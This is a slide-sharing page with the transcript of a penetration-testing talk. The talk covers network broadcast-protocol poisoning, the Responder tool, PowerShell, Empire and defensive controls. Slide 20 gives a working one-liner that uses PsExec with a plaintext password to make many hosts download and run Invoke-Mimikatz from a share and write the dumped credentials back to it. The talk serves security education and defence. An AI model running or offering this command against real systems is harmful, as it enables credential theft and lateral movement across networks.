1 / 38

Common Network Penetration Testing Techniques

Common Network Penetration Testing Techniques. Russel Van Tuyl. Russel Van Tuyl Security Analyst TN Air National Guard SANS MSISE Student Father of 2, Husband to 1 Russel.VanTuyl@gmail.com.

jeason
Download Presentation

Common Network Penetration Testing Techniques

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Common Network Penetration Testing Techniques Russel Van Tuyl

  2. Russel Van Tuyl • Security Analyst • TN Air National Guard • SANS MSISE Student • Father of 2, Husband to 1 • Russel.VanTuyl@gmail.com Russel C. Van Tuyl | Security Analyst | Sword & Shield Enterprise Security1431 Centerpoint Blvd., Suite 150 | Knoxville, TN 37932P: 865-244-3568 | M: 865-214-0579 | rcvt@sses.net

  3. This is how I hack!

  4. Hack All The Things • External Network • (Web) Apps • Internal Network • Social Engineering • Wireless • Physical

  5. Methodology • Recon/Intel Gathering • Vulnerability Identification/Analysis • Exploitation • Post Exploitation • Reporting (boo)

  6. Phishing

  7. Social Engineering - Pretext

  8. External Assessment

  9. Internal Assessment

  10. How I see networks

  11. Broadcast Messages • Go to every host on the subnet • Typically in search of a resource (like name resolution) • Common Windows Broadcast Protocols • NetBIOS • RFC 1001 & 1002 • LLMNR • RFC 4795 • 244.0.0.252 (Link Scope Multicast) • Types • Windows Redirector • File Server • Print Server • WPAD

  12. NetBIOS Name Service (NBNS) Broadcast Messages

  13. Link-Local Multicast Name Resolution (LLMNR) Multicast Messages

  14. Web Proxy Autodiscovery Protocol (WPAD) • Standard • Internet Engineering Task Force (IETF) draft • http://tools.ietf.org/html/draft-ietf-wrec-wpad-01 • Expired December 1999 • Discovery • DHCP • DNS • Proxy Auto-Config (PAC) • wpad.dat • http://findproxyforurl.com

  15. Responder by Laurent Gaffie • @pythonresponder • Trustwave SpiderLabs • https://github.com/SpiderLabs/Responder

  16. runas.exe

  17. Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked typologies by utilizing standards-based remoting protocols.

  18. powershell.exe • Built on .NET Framework • Verb-Noun • Tab Complete • Alias • Structured Data/Objects • Syntax Highlighting (version 5) • Released in 2006 on XP*/Vista/Server 2003 • .ps1 • Modules .psm1 • Integrated Scripting Environment (ISE)

  19. Download Cradle

  20. ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p P@$$word1 -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\172.16.1.205\data\Invoke-Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}”}

  21. questions?

  22. PowerShell Empire Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

  23. Sensitive Data Image removed for distribution

  24. Strong Passwords • Password Database • Local Admin • Disable & Rename • Implement LAPS https://support.microsoft.com/en-us/kb/3062591 • Credential Theft • Protected LSASS • Privileged Access Workstations (PAWS) • https://technet.microsoft.com/en-us/library/mt634654.aspx • Least Privilege • Logging • Powershell v5 • http://www.malwarearchaeology.com/log-md/ • Monitor & restrict egress

  25. Center for Internet Security (CIS) Critical Security Controls • https://www.cisecurity.org/critical-controls.cfm • CSC 1: Inventory of Authorized and Unauthorized DevicesCSC 2: Inventory of Authorized and Unauthorized SoftwareCSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and ServersCSC 4: Continuous Vulnerability Assessment and RemediationCSC 5: Controlled Use of Administrative PrivilegesCSC 6: Maintenance, Monitoring, and Analysis of Audit LogsCSC 7: Email and Web Browser ProtectionsCSC 8: Malware DefensesCSC 9: Limitation and Control of Network Ports, Protocols, and ServicesCSC 10: Data Recovery CapabilityCSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and SwitchesCSC 12: Boundary DefenseCSC 13: Data ProtectionCSC 14: Controlled Access Based on the Need to KnowCSC 15: Wireless Access ControlCSC 16: Account Monitoring and ControlCSC 17: Security Skills Assessment and Appropriate Training to Fill GapsCSC 18: Application Software SecurityCSC 19: Incident Response and ManagementCSC 20: Penetration Tests and Red Team Exercises

  26. How To Get Owned in 10 Easy Steps Don’t patch anything Don’t harden servers Use default/weak passwords, in multiple places Use shared accounts/passwords Use poorly written applications Allow unrestricted inbound traffic Allow unrestricted outbound traffic Use the highest possible privilege levels Put everything on the Internet (bcuz YOLO!) Assume everything is OK

  27. Questions?

More Related